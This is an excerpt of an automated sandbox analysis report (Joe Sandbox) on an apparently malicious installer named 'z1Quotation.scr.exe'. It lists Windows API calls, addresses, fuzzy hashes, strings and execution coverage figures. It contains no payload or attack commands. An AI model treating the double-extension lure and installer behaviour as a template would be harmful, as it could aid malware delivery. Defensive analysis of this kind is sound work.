                                                                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                  • String ID: $M$N
                                                                                                                  • API String ID: 2564846305-813528018
                                                                                                                  • Opcode ID: e4b5a23f527649b059869bfb33c614290955204e5ac428825b8bd88383326227
                                                                                                                  • Instruction ID: 4d796b0844a18dba4b3a5af92218c1317593fcd6e807591b857f5f84ca84bb31
                                                                                                                  • Opcode Fuzzy Hash: e4b5a23f527649b059869bfb33c614290955204e5ac428825b8bd88383326227
                                                                                                                  • Instruction Fuzzy Hash: 81026DB0A00609AFDF20DF54DD45AAE7BB5FB44354F14813AEA11BA2E1C7788D82CF58
                                                                                                                  APIs
                                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404634
                                                                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404648
                                                                                                                  • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404666
                                                                                                                  • GetSysColor.USER32(?), ref: 00404677
                                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404686
                                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404695
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00404698
                                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004046A7
                                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004046BC
                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040471E
                                                                                                                  • SendMessageA.USER32(00000000), ref: 00404721
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040474C
                                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040478C
                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040479B
                                                                                                                  • SetCursor.USER32(00000000), ref: 004047A4
                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004047BA
                                                                                                                  • SetCursor.USER32(00000000), ref: 004047BD
                                                                                                                  • SendMessageA.USER32(00000111,?,00000000), ref: 004047E9
                                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004047FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                  • String ID: N$2B
                                                                                                                  • API String ID: 3103080414-1121222966
                                                                                                                  • Opcode ID: 7aaf303589d1806f3c5c3ec5ec1ef78a634fef0f57fc38d790edad24e7d650cf
                                                                                                                  • Instruction ID: f0df9ebe042f0e09a393b8a8d111da8af5027e336a798367db55d4f5f22ce0d2
                                                                                                                  • Opcode Fuzzy Hash: 7aaf303589d1806f3c5c3ec5ec1ef78a634fef0f57fc38d790edad24e7d650cf
                                                                                                                  • Instruction Fuzzy Hash: A561B3B1A00209BFEB10AF61DD41F6A3B69EB84714F10843AFB00BB1D1C778A951CF98
                                                                                                                  APIs
                                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                  • DrawTextA.USER32(00000000,Inaugurates Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                  • String ID: F$Inaugurates Setup
                                                                                                                  • API String ID: 941294808-1989954421
                                                                                                                  • Opcode ID: fd3c55e467a7729ccf7c85589dbda29c4605c5292bdc4fc1e7e332042d628291
                                                                                                                  • Instruction ID: 940e876990e797217803a3edca5eb74fa4908c9b1d1368a1209cd74081a255fd
                                                                                                                  • Opcode Fuzzy Hash: fd3c55e467a7729ccf7c85589dbda29c4605c5292bdc4fc1e7e332042d628291
                                                                                                                  • Instruction Fuzzy Hash: 03419C71400209AFCB058F95DE459BFBBB9FF44314F00842EF991AA1A0C738DA54DFA4
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00406198,?,?), ref: 00406038
                                                                                                                  • GetShortPathNameA.KERNEL32(?,004226E0,00000400), ref: 00406041
                                                                                                                    • Part of subcall function 00405E96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA6
                                                                                                                    • Part of subcall function 00405E96: lstrlenA.KERNEL32(00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ED8
                                                                                                                  • GetShortPathNameA.KERNEL32(?,00422AE0,00000400), ref: 0040605E
                                                                                                                  • wsprintfA.USER32 ref: 0040607C
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00422AE0,C0000000,00000004,00422AE0,?,?,?,?,?), ref: 004060B7
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C6
                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FE
                                                                                                                  • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004222E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406154
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406165
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616C
                                                                                                                    • Part of subcall function 00405F31: GetFileAttributesA.KERNELBASE(00000003,00402FA4,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405F35
                                                                                                                    • Part of subcall function 00405F31: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F57
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                  • String ID: %s=%s$[Rename]$&B$*B$*B
                                                                                                                  • API String ID: 2171350718-779947378
                                                                                                                  • Opcode ID: c4bbbc6b5610b33bf20e07bc27bb868b4785a2ec59af68f78f2043699e73542c
                                                                                                                  • Instruction ID: 3212f88d1ae0b3abc92edcbd83ccc13ec3cf73ff012a95f320e7e7a5298a3394
                                                                                                                  • Opcode Fuzzy Hash: c4bbbc6b5610b33bf20e07bc27bb868b4785a2ec59af68f78f2043699e73542c
                                                                                                                  • Instruction Fuzzy Hash: 3A3125312007157BC2206B659D48F6B3A6CDF45758F16003BFA42FA2C3EA7C992286BD
                                                                                                                  APIs
                                                                                                                  • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 004066F0
                                                                                                                  • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 004066FD
                                                                                                                  • CharNextA.USER32(0000000C,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00406702
                                                                                                                  • CharPrevA.USER32(0000000C,0000000C,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00406712
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406699
                                                                                                                  • "C:\Users\user\Desktop\z1Quotation.scr.exe", xrefs: 00406698
                                                                                                                  • *?|<>/":, xrefs: 004066E0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                  • String ID: "C:\Users\user\Desktop\z1Quotation.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                  • API String ID: 589700163-2992510115
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402EDA
                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EF8
                                                                                                                  • wsprintfA.USER32 ref: 00402F26
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                    • Part of subcall function 004054E2: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                    • Part of subcall function 004054E2: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402E2A,00000000), ref: 00402F4A
                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402F58
                                                                                                                    • Part of subcall function 00402EA6: MulDiv.KERNEL32(000165DB,00000064,0001E074), ref: 00402EBB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                  • String ID: ... %d%%$#Vh*.@
                                                                                                                  • API String ID: 722711167-1861102526
                                                                                                                  APIs
                                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004044C2
                                                                                                                  • GetSysColor.USER32(00000000), ref: 00404500
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0040450C
                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00404518
                                                                                                                  • GetSysColor.USER32(?), ref: 0040452B
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040453B
                                                                                                                  • DeleteObject.GDI32(?), ref: 00404555
                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040455F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2320649405-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6D4312A5: GlobalAlloc.KERNEL32(00000040,6D4312C3,?,6D43135F,-6D43504B,6D4311C0,-000000A0), ref: 6D4312AD
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D43266E
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D4326A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1780285237-0
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404DAC
                                                                                                                  • GetMessagePos.USER32 ref: 00404DB4
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404DCE
                                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404DE0
                                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404E06
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                  • String ID: f
                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(?), ref: 00401E3D
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E57
                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5F
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E70
                                                                                                                  • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                  • String ID: Tahoma
                                                                                                                  • API String ID: 3808545654-3580928618
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E45
                                                                                                                  • wsprintfA.USER32 ref: 00402E79
                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402E89
                                                                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                                  APIs
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D4324D7
                                                                                                                    • Part of subcall function 6D4312B4: lstrcpynA.KERNEL32(00000000,?,6D43135F,-6D43504B,6D4311C0,-000000A0), ref: 6D4312C4
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6D432452
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6D432467
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6D432478
                                                                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 6D432486
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D43248D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3730416702-0
                                                                                                                  APIs
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040284E
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040286A
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004028A9
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028BC
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028D8
                                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2667972263-0
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(Inaugurates Setup: Installing,Inaugurates Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404BA2,000000DF,00000000,00000400,?), ref: 00404D25
                                                                                                                  • wsprintfA.USER32 ref: 00404D2D
                                                                                                                  • SetDlgItemTextA.USER32(?,Inaugurates Setup: Installing), ref: 00404D40
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                  • String ID: %u.%u%s%s$Inaugurates Setup: Installing
                                                                                                                  • API String ID: 3540041739-3717247011
                                                                                                                  APIs
                                                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D94
                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DE0
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DE9
                                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E00
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEnum$DeleteValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1354259210-0
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D83
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00401DD1
                                                                                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E01
                                                                                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E15
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401E25
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1849352358-0
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CA3
                                                                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CBB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034BE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00405D36
                                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034BE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00405D3F
                                                                                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405D50
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(000002E8,C:\Users\user\AppData\Local\Temp\,004038B8,?,?,00000008,0000000A,0000000C), ref: 00403AC7
                                                                                                                  • CloseHandle.KERNEL32(000002F0,C:\Users\user\AppData\Local\Temp\,004038B8,?,?,00000008,0000000A,0000000C), ref: 00403ADB
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403ABA
                                                                                                                  • C:\Users\user\AppData\Local\Temp\nsi8284.tmp, xrefs: 00403AEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsi8284.tmp
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405485
                                                                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 004054D6
                                                                                                                    • Part of subcall function 0040448A: SendMessageA.USER32(0001042E,00000000,00000000,00000000), ref: 0040449C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402FCD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1Quotation.scr.exe,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405D7D
                                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402FCD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1Quotation.scr.exe,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405D8B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                  APIs
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6D43116B
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6D4311D8
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D431286
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D43129B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA6
                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405EBE
                                                                                                                  • CharNextA.USER32(00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ECF
                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ED8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                  • String ID:

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:6.6%
                                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                  Signature Coverage:3.2%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:79
